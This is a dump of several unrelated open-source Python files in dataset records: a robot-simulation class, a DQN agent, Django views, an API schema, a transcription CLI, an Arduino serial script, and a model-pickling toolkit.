Handles the\n finger mimicked position for the hands (when getting the position of\n RHand or LHand, will return the hand's opening percentage).\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints\n\n Returns:\n joint_positions - List of float (or float if only one joint)\n containing the joint's positions in radians\n \"\"\"\n if type(joint_names) is str:\n names = [joint_names]\n else:\n names = list(joint_names)\n\n joint_positions = RobotVirtual.getAnglesPosition(self, names)\n\n for hand, finger in zip(\n [\"RHand\", \"LHand\"],\n [\"RFinger11\", \"LFinger11\"]):\n for i in range(names.count(hand)):\n index = names.index(hand)\n joint_positions[index] =\\\n RobotVirtual.getAnglesPosition(self, [finger]).pop() /\\\n (1/(self.joint_dict[finger].getUpperLimit() -\n self.joint_dict[finger].getLowerLimit())) +\\\n self.joint_dict[finger].getLowerLimit()\n\n if len(joint_positions) == 1:\n return joint_positions.pop()\n else:\n return joint_positions\n\n def getAnglesVelocity(self, joint_names):\n \"\"\"\n Overloads @getAnglesVelocity from the @RobotVirtual class. The method\n won't return the velocity of RHand and LHand joints.\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints\n\n Returns:\n joint_velocities - List of float (or float if only one joint)\n containing the joint's velocities in rad/s\n \"\"\"\n if type(joint_names) is str:\n names = [joint_names]\n else:\n names = list(joint_names)\n\n joint_velocities = RobotVirtual.getAnglesVelocity(self, names)\n\n if len(joint_velocities) == 1:\n return joint_velocities.pop()\n else:\n return joint_velocities\n\n def goToPosture(self, posture_name, percentage_speed):\n \"\"\"\n Position the virtual robot into a particular posture. The different\n available postures are NaoPosture objects.\n\n Parameters:\n posture_name - String containing the name of the posture. 
The\n posture name is not case-sensitive\n percentage_speed - Percentage of the max speed to be used for the\n movement\n\n Returns:\n Boolean - True if the posture can be applied, False otherwise\n \"\"\"\n posture_list = [\n RomeoVirtual.P_STAND,\n RomeoVirtual.P_STAND_INIT,\n RomeoVirtual.P_STAND_ZERO,\n RomeoVirtual.P_CROUCH]\n\n for posture in posture_list:\n if posture.isPostureName(posture_name):\n self.setAngles(\n posture.getPostureJointNames(),\n posture.getPostureJointValues(),\n percentage_speed)\n\n return True\n\n return False\n\n def _mimicHand(\n self,\n hand,\n value,\n multiplier=0.988205,\n thumb_multiplier=1.74533,\n offset=0.0):\n \"\"\"\n Used to propagate a joint value on the fingers attached to the hand.\n The formula used to mimic a joint is the following:\n\n finger_value = (hand_value * multiplier) + offset\n\n Parameters:\n hand - String, RHand or LHand\n value - The joint value to be propagated\n multiplier - The multiplier coefficient for the fingers and the\n sections 2 and 3 of the thumbs (0.988205 by default)\n thumb_multiplier - The multiplier coefficient for the first section\n of the thumb (1.74533 by default)\n offset - The offset coefficient (0.0 by default)\n\n Returns:\n finger_names - Names of the finger to be controlled\n finger_values - Values of the fingers to be controlled\n \"\"\"\n finger_names = list()\n finger_values = list()\n\n for joint_name in self.joint_dict.keys():\n if hand[0] + \"Thumb1\" in joint_name:\n finger_names.append(joint_name)\n finger_values.append((value * thumb_multiplier) + offset)\n elif (hand[0] + \"Finger\") in joint_name or\\\n (hand[0] + \"Thumb\") in joint_name:\n finger_names.append(joint_name)\n finger_values.append((value * multiplier) + offset)\n\n return finger_names, finger_values\n", "repo_name": "softbankrobotics-research/qibullet", "sub_path": "qibullet/romeo_virtual.py", "file_name": "romeo_virtual.py", "file_ext": "py", "file_size_in_byte": 14895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 130, "dataset": "github-code", "pt": "52", "api": [{"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 14, "usage_type": "name"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 24, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 25, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 26, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 27, "usage_type": "call"}, {"api_name": "qibullet.tools._check_resources_installed", "line_number": 35, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 35, "usage_type": "name"}, {"api_name": "qibullet.tools._install_resources", "line_number": 36, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 36, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.__init__", "line_number": 39, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 39, "usage_type": "name"}, {"api_name": "qibullet.tools._get_resources_folder", "line_number": 41, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 41, "usage_type": "name"}, {"api_name": "pybullet.setAdditionalSearchPath", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 63, 
"usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.loadRobot", "line_number": 69, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 69, "usage_type": "name"}, {"api_name": "pybullet.createConstraint", "line_number": 75, "usage_type": "call"}, {"api_name": "pybullet.JOINT_FIXED", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 90, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 99, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 108, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 115, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 122, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 129, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 136, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 145, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 156, "usage_type": "call"}, {"api_name": "pybullet.resetJointState", "line_number": 165, "usage_type": "call"}, {"api_name": "pybullet.removeConstraint", "line_number": 171, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraRgb", "line_number": 183, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraRgb", "line_number": 191, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraDepth", "line_number": 199, "usage_type": "call"}, {"api_name": "qibullet.imu.Imu", "line_number": 213, "usage_type": "call"}, {"api_name": "pybullet.error", "line_number": 249, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.setAngles", "line_number": 265, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 265, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesPosition", "line_number": 290, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 290, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesPosition", "line_number": 298, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 298, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesVelocity", "line_number": 326, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 326, "usage_type": "name"}]} +{"seq_id": "24883816787", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom collections import deque\nimport random\nfrom utils import FrameStack, WarpFrame, Uint2Float\nimport time\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\nclass DQNNet(nn.Module):\n def __init__(self, n_actions):\n super(DQNNet, self).__init__()\n\n self.conv = nn.Sequential(nn.Conv2d(4, 32, kernel_size=8, stride=4), nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.ReLU())\n self.fc = nn.Sequential(nn.Linear(7 * 7 * 64, 512), nn.ReLU(), nn.Linear(512, n_actions))\n\n def forward(self, obs):\n #obs = TorchFrame(obs).to(device)\n obs = Uint2Float(obs)\n obs = obs.view(-1, 4, 84, 84)\n obs = self.conv(obs)\n obs = obs.view(obs.shape[0], obs.shape[1] * obs.shape[2] * obs.shape[3])\n 
actions = self.fc(obs)\n return actions\n\n\nclass ReplayBuffer(object):\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def push(self, state, action, reward, next_state, done):\n self.buffer.append([state, action, reward, next_state, done])\n\n def sample(self, batch_size):\n #state, action, reward, next_state, done = map(list, zip(*random.sample(self.buffer, batch_size)))\n state, action, reward, next_state, done = zip(*random.sample(self.buffer, batch_size))\n return state, action, reward, next_state, done\n\n def __len__(self):\n return len(self.buffer)\n\nclass DQNAgent():\n def __init__(self,\n env,\n lr=0.00025,\n alpha=0.95,\n gamma=0.99,\n rep_buf_size=125000,\n rep_buf_ini=12500,\n batch_size=32,\n target_update=5000,\n skip_frame = 4):\n self.env = env\n self.n_actions = env.action_space.n\n self.gamma = gamma\n self.rep_buf_size = rep_buf_size\n self.rep_buf_ini = rep_buf_ini\n self.batch_size = batch_size\n self.target_update = target_update\n self.device = device\n self.policy_model = DQNNet(self.n_actions).to(device)\n self.target_model = DQNNet(self.n_actions).to(device)\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self.optimizer = torch.optim.RMSprop(self.policy_model.parameters(), lr=lr, alpha=alpha)\n self.replay_buffer = ReplayBuffer(rep_buf_size)\n self.skip_frame = skip_frame\n self.init_replay()\n\n def init_replay(self):\n while len(self.replay_buffer) < self.rep_buf_ini:\n observation = self.env.reset()\n observation = WarpFrame(observation)\n observation = np.stack([observation] * 4, axis=0)\n done = False\n\n while not done:\n action = self.env.action_space.sample()\n\n next_observation, reward, done, info = self.env.step(action)\n next_observation = FrameStack(next_observation, observation)\n\n self.replay_buffer.push(observation, action, reward, next_observation, done)\n\n observation = next_observation\n\n print('Experience Replay buffer initialized')\n\n def choose_action(self, obs, epsilon):\n if random.random() > epsilon:\n obs = torch.from_numpy(np.array(obs)).float().to(device)\n q_value = self.policy_model(obs)\n action = q_value.argmax(1).data.cpu().numpy().astype(int)[0]\n else:\n action = self.env.action_space.sample()\n return action\n\n def huber_loss(self, input, target, beta=1, size_average=True):\n \"\"\"\n very similar to the smooth_l1_loss from pytorch, but with\n the extra beta parameter\n \"\"\"\n n = torch.abs(input - target)\n cond = n < beta\n loss = torch.where(cond, 0.5 * n ** 2 / beta, n - 0.5 * beta)\n if size_average:\n return loss.mean()\n return loss.sum()\n\n def learn(self, num_frames):\n \"\"\"\n Update the policy\n \"\"\"\n loss = 0\n if len(self.replay_buffer) > self.batch_size and num_frames % self.skip_frame == 0:\n observations, actions, rewards, next_observations, dones = self.replay_buffer.sample(self.batch_size)\n observations = torch.from_numpy(np.array(observations)).float().to(device)\n\n actions = torch.from_numpy(np.array(actions).astype(int)).float().to(device)\n actions = actions.view(actions.shape[0], 1)\n\n rewards = torch.from_numpy(np.array(rewards)).float().to(device)\n rewards = rewards.view(rewards.shape[0], 1)\n\n dones = torch.from_numpy(np.array(dones).astype(int)).float().to(device)\n dones = dones.view(dones.shape[0], 1)\n\n next_observations = torch.from_numpy(np.array(next_observations)).float().to(device)\n\n q_values = self.policy_model(observations)\n next_q_values = self.target_model(next_observations)\n\n q_value = q_values.gather(1, 
actions.long())\n next_q_value = next_q_values.max(1)[0].unsqueeze(1)\n expected_q_value = rewards + self.gamma * next_q_value * (1 - dones)\n\n loss = self.huber_loss(q_value, expected_q_value)\n\n self.optimizer.zero_grad()\n loss.backward()\n\n self.optimizer.step()\n\n loss = loss.item()\n\n if num_frames % self.target_update == 0:\n self.target_model.load_state_dict(self.policy_model.state_dict())\n\n return loss\n\n", "repo_name": "YSLIU627/ML-project-2020", "sub_path": "gaby_version/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 5716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.Uint2Float", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 35, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim.RMSprop", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 70, "usage_type": "attribute"}, {"api_name": "utils.WarpFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.FrameStack", "line_number": 86, "usage_type": "call"}, {"api_name": "random.random", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 130, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "38556360396", "text": "from django.shortcuts import render\nfrom .models import *\nfrom apps.homepage.models import *\n\ndef project(request):\n projects = Projects.objects.all()\n category = Category.objects.all()\n settings = Settings.objects.latest('id')\n context = {\n 'projects': projects,\n 'category': category,\n 'settings': settings,\n 'home': 'Главная',\n 'next': 'Проекты'\n }\n return render(request, 'projects/project.html', context)\n\ndef single_project(request, slug):\n projects = Projects.objects.get(slug=slug)\n images = ProjectImages.objects.filter(project = projects)\n settings = Settings.objects.latest('id')\n context = {\n 'projects': projects,\n 'settings': settings,\n 'images': images,\n 'home': 'Главная',\n 'next': 'Детали проекта'\n }\n return render(request, 'projects/project-details.html', context)\n \n\n", "repo_name": "Tazabek/construction", "sub_path": "apps/project/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "28037935940", "text": "from textwrap import dedent\n\nfrom rest_framework.schemas.openapi import AutoSchema\n\nfrom ._errors import error_responses\nfrom ._message import message_with_id_schema\n\n\nclass SaveAlgorithmManifestSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"POST\":\n operation[\"operationId\"] = \"SaveAlgorithmManifest\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n return dedent(\n \"\"\"\\\n Saves an uploaded algorithm manifest to the desired project. It is expected this manifest\n corresponds with an algorithm workflow to be registered by another endpoint.\n\n Manifest is uploaded via tus, a separate mechanism from the REST API. 
Once a manifest\n            upload is complete (a .yaml file), the file must be saved to the database using\n            this endpoint.\n            \"\"\"\n        )\n\n    def get_path_parameters(self, path, method):\n        return [\n            {\n                \"name\": \"project\",\n                \"in\": \"path\",\n                \"required\": True,\n                \"description\": \"A unique integer identifying a project\",\n                \"schema\": {\"type\": \"integer\"},\n            }\n        ]\n\n    def get_filter_parameters(self, path, method):\n        return []\n\n    def get_request_body(self, path, method):\n        body = {}\n        if method == \"POST\":\n            body = {\n                \"required\": True,\n                \"content\": {\n                    \"application/json\": {\n                        \"schema\": {\"$ref\": \"#/components/schemas/AlgorithmManifestSpec\"},\n                    }\n                },\n            }\n\n        return body\n\n    def get_responses(self, path, method):\n        responses = error_responses()\n        if method == \"POST\":\n            responses[\"201\"] = {\n                \"description\": \"Successful save of algorithm manifest.\",\n                \"content\": {\n                    \"application/json\": {\n                        \"schema\": {\n                            \"$ref\": \"#/components/schemas/AlgorithmManifest\",\n                        }\n                    }\n                },\n            }\n        return responses\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/schema/save_algorithm_manifest.py", "file_name": "save_algorithm_manifest.py", "file_ext": "py", "file_size_in_byte": 2254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.schemas.openapi.AutoSchema", "line_number": 9, "usage_type": "name"}, {"api_name": "textwrap.dedent", "line_number": 18, "usage_type": "call"}, {"api_name": "_errors.error_responses", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "73016625124", "text": "import argparse\nfrom whisper_spln.parserTasks import clearLogs, getLogs, getQueue, runWhisper\n\n\ndef main():\n    parser = argparse.ArgumentParser(\n        prog='AudioToText',\n        description='Converts an audio file to a text file.',\n        epilog='Made for SPLN 2022/2023'\n    )\n\n    # Add arguments\n    parser.add_argument('input_file', type=str,\n                        help='Path to the file with the audio')\n    parser.add_argument('-d', '--dest', type=str, default='result.txt',\n                        help='Path for the output file')\n    parser.add_argument('-il', '--inputLang', type=str,\n                        help='Language of the input file')\n    parser.add_argument('-ol', '--outputLang', type=str,\n                        help='Language of the output text')\n    parser.add_argument('-q', '--queue', action=QueueAction,\n                        help='Show the audio conversion queue')\n    parser.add_argument('-l', '--logs', action=LogsAction,\n                        help='Show the execution logs')\n    parser.add_argument('-cl', '--clearLogs', action=ClearLogsAction,\n                        help='Clear logs')\n    # Parse the command-line arguments\n    args = parser.parse_args()\n    # Access the values of the arguments\n    input_file = args.input_file\n    dest_folder = args.dest\n    inputLang = args.inputLang\n    outputLang = args.outputLang\n\n    runWhisper(input_file, dest_folder, inputLang, outputLang)\n\n\nclass QueueAction(argparse.Action):\n    def __init__(self, option_strings, dest, **kwargs):\n        return super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n    def __call__(self, parser, namespace, values, option_string, **kwargs):\n        getQueue()\n        parser.exit()\n\n\nclass LogsAction(argparse.Action):\n    def __init__(self, option_strings, dest, **kwargs):\n        return super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n    def __call__(self, parser, namespace, values, option_string, **kwargs):\n        getLogs()\n        parser.exit()\n\n\nclass ClearLogsAction(argparse.Action):\n    def __init__(self, option_strings, dest, **kwargs):\n        return 
super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string, **kwargs):\n clearLogs()\n parser.exit()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "LCMJ21/Whisper", "sub_path": "whisper_spln/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "whisper_spln.parserTasks.runWhisper", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 38, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 40, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.getQueue", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 47, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 49, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.getLogs", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 56, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 58, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.clearLogs", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "42734296241", "text": "'''\r\n Arduino waits for 0\r\n 1-Start\r\n 2-Stop\r\n'''\r\n\r\nimport serial\r\nimport time\r\n\r\n\r\nCOM_port = 'COM9'\r\nbaudRate = 9600\r\ncommand_start = '1'\r\ncommand_stop = '2'\r\ncomputer_acknowledgement = '0'\r\narduino_acknowledgement = '0'\r\n\r\n\r\n\r\ndef main():\r\n s = serial.Serial(COM_port, baudRate)\r\n print(\"Connected to port : \" + s.portstr)\r\n time.sleep(1)\r\n s.write(computer_acknowledgement.encode())\r\n time.sleep(1)\r\n rec = s.readline()\r\n print(rec.decode())\r\n ch = '0'\r\n while ch != '3' :\r\n print(\"1-Start\\n2-Stop\\n3-Exit\\nChoice = \")\r\n ch = input()\r\n if ch == '1' :\r\n s.write(command_start.encode())\r\n time.sleep(1)\r\n rec1 = s.readline()\r\n print(rec1.decode())\r\n elif ch == '2' :\r\n s.write(command_stop.encode())\r\n time.sleep(1)\r\n rec2 = s.readline()\r\n print(rec2.decode())\r\n elif ch == '3' :\r\n s.close()\r\n print(\"Port Closed\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "repo_name": "suheldeep97/ThrusterComm", "sub_path": "ComputerCOM_Code_Basic.py", "file_name": "ComputerCOM_Code_Basic.py", "file_ext": "py", "file_size_in_byte": 1044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.Serial", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "7608816836", "text": "import copy\nimport time\nfrom collections import Counter, defaultdict\n\nfrom panaxea.core.Model import Model\nfrom panaxea.core.Steppables import Helper\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n\nclass AgentSummary(Helper, object):\n \"\"\"\n Helper class which, in the epilogue of each epoch, returns a summary of\n the count of agents belonging to each class\n considering the union of the schedule and 
agentsToSchedule.\n\n    Attributes\n    ----------\n    recordEvery : int, optional\n        Defines every how many epochs an agent summary is returned. Defaults\n        to 1. (Ie: Every epoch)\n    \"\"\"\n\n    def __init__(self, record_every=1):\n        self.agentSummary = []\n        self.recordEvery = record_every\n\n    def step_epilogue(self, model):\n        \"\"\"\n        Builds a summary of number of agents per agent class in the model.\n\n        Parameters\n        ----------\n        model : Model\n            An instance of the model on which the current simulation is based.\n\n        Returns\n        -------\n        Counter\n            A counter object where keys correspond to agent classes and\n            values to agent counts.\n        \"\"\"\n        c = None\n        if model.current_epoch % self.recordEvery == 0:\n            c = Counter([a.__class__.__name__ for a in\n                         model.schedule.agents.union(\n                             model.schedule.agents_to_schedule)])\n            self.agentSummary.append(c)\n\n        return c\n\n\nclass ModelPickler(Helper, object):\n    \"\"\"\n    At each epoch, outputs a serialized copy of the model in its current state.\n\n    Attributes\n    ----------\n    outDir : string\n        The directory where pickle files should be outputted. This should be\n        specified as relative to the script\n        from which the simulation is launched\n    \"\"\"\n\n    def __init__(self, out_dir):\n        self.outDir = out_dir\n\n    def step_epilogue(self, model):\n        \"\"\"\n        Creates and saves the pickle file.\n\n        model : Model\n            An instance of the model on which the current simulation is based.\n        \"\"\"\n        with open(\"%s/epoch_%s.pickle\" % (self.outDir, model.current_epoch),\n                  \"wb\") as output_file:\n            pickle.dump(model, output_file)\n\n\nclass ModelPicklerLite(Helper, object):\n    \"\"\"\n    Creates a lighter version of the pickle, allowing specific elements to be\n    included or excluded.\n\n    Attributes\n    ----------\n    outDir : string\n        The directory where pickle files should be outputted. This should be\n        specified as relative to the script\n        from which the simulation is launched\n    prefix : string, optional\n        A prefix that will be given to the name of each output file. Eg: For\n        a prefix \"my_model\" a sample output\n        file would be my_model_epoch_0.pickle Defaults to None\n    pickleEvery: number, optional\n        Determines the frequency of model serializing. A value of 1 will\n        create one pickle per epoch, a value of 2\n        will create a pickle every other epoch, etc. Defaults to 1.\n    pickleSchedule : bool, optional\n        If set to true, the schedule object will be included. This will also\n        include all agents on the schedule.\n        Defaults to false.\n    pickleEnvs : bool, optional\n        If set to true, all environment objects will be included. This also\n        includes all agents in every environment.\n        Defaults to false.\n    \"\"\"\n\n    # If virtualPickle is set to true the modelLite will be returned rather\n    # than pickled\n    # pickleEvery means the model will be pickled every x epochs, defaults to 1\n    def __init__(self, out_dir, prefix=None, pickle_every=1,\n                 pickle_schedule=False, pickle_envs=False):\n        self.out_dir = out_dir\n        self.pickle_every = pickle_every\n        self.prefix = prefix\n        self.pickle_schedule = pickle_schedule\n        self.pickle_envs = pickle_envs\n\n    # It is important this is in the epilogue as we check for an exit flag\n    # which is set by helpers in the prologue!\n    def step_epilogue(self, model):\n        \"\"\"\n        Makes a call to the pickleModel method. 
No special logic here,\n        just delegating to the method.\n\n        Parameters\n        ----------\n        model : Model\n            An instance of the model on which the current simulation is based.\n        \"\"\"\n\n        if model.current_epoch > 0 and (\n                model.current_epoch % self.pickle_every == 0 or\n                model.current_epoch == model.epochs - 1 or model.exit):\n            self.pickle_model(model)\n\n    def pickle_model(self, model):\n        \"\"\"\n        Creates and serializes the pickleLight object based on previously\n        defined properties.\n\n        Parameters\n        ----------\n        model : Model\n            An instance of the model on which the current simulation is based.\n        \"\"\"\n        start = time.time()\n        model_lite = Model(5)\n\n        if self.pickle_schedule:\n            model_lite.schedule.agents = model.schedule.agents.union(\n                model.schedule.agents_to_schedule)\n\n            for a in model_lite.schedule.agents:\n                if a.__class__.__name__ == \"CancerCell\":\n                    # Can't pickle functions\n                    a.reactToDrug_ = None\n\n            model_lite.schedule.helpers = [h for h in model.schedule.helpers if\n                                           h.__class__.__name__ not in\n                                           \"ExitConditionWatcher\"]\n\n        if self.pickle_envs:\n            model_lite.environments = copy.deepcopy(model.environments)\n            env_start = time.time()\n            for k, v in model_lite.environments.items():\n                v.grid = dict(v.grid)\n            env_end = time.time()\n            print(\"Cloning environments took %s seconds\" % str(\n                env_end - env_start))\n\n        model_lite.output = model.output\n\n        model_lite.properties = model.properties\n        # Can't pickle functions\n        model_lite.properties[\"agents\"][\"cancerCells\"][\n            \"drugReactFunction\"] = None\n        model_lite.current_epoch = model.current_epoch\n\n        if self.prefix is None:\n            target = \"%s/epoch_%s.pickle\" % (self.out_dir, model.current_epoch)\n        else:\n            target = \"%s/%s_epoch_%s.pickle\" % (\n                self.out_dir, self.prefix, model.current_epoch)\n        with open(target, \"wb\") as output_file:\n            pickle.dump(model_lite, output_file)\n        end = time.time()\n        print(\"Pickler lite took %s seconds\" % str(end - start))\n\n\ndef depickle_from_lite(pickle_path):\n    \"\"\"\n    Given a path to a pickle light file, recreates the corresponding object\n    with all available properties\n\n    This is **not** a helper and **should not be added to the schedule**. 
It\n    is useful to recreate (partial)\n    model objects.\n\n    This model may or may not be runnable when recreated depending on\n    whether all properties (schedule, environments...)\n    were retained.\n\n    Parameters\n    ----------\n    pickle_path : string\n        The path to the pickle file relative to where the function is being\n        called from.\n\n    Returns\n    -------\n    Model\n        A (potentially incomplete) instance of a model derived from the\n        pickle file.\n    \"\"\"\n    try:\n        with open(pickle_path, 'rb') as f:\n            model = pickle.load(f, encoding='latin1')\n    except TypeError:\n        with open(pickle_path, 'rb') as f:\n            model = pickle.load(f)\n\n    # Handling both Python 2 and 3\n\n    environment_keys = model.environments.keys()\n\n    for environment_key in environment_keys:\n        environment = model.environments[environment_key]\n\n        if \"ObjectGrid\" in environment.__class__.__name__:\n            model.environments[environment_key].grid = \\\n                defaultdict(set, environment.grid)\n        else:\n            model.environments[environment_key].grid = \\\n                defaultdict(int, environment.grid)\n    return model\n", "repo_name": "DarioPanada/panaxea", "sub_path": "panaxea/toolkit/Toolkit.py", "file_name": "Toolkit.py", "file_ext": "py", "file_size_in_byte": 7985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "panaxea.core.Steppables.Helper", "line_number": 14, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 47, "usage_type": "call"}, {"api_name": "panaxea.core.Steppables.Helper", "line_number": 55, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "panaxea.core.Steppables.Helper", "line_number": 82, "usage_type": "name"}, {"api_name": "time.time", "line_number": 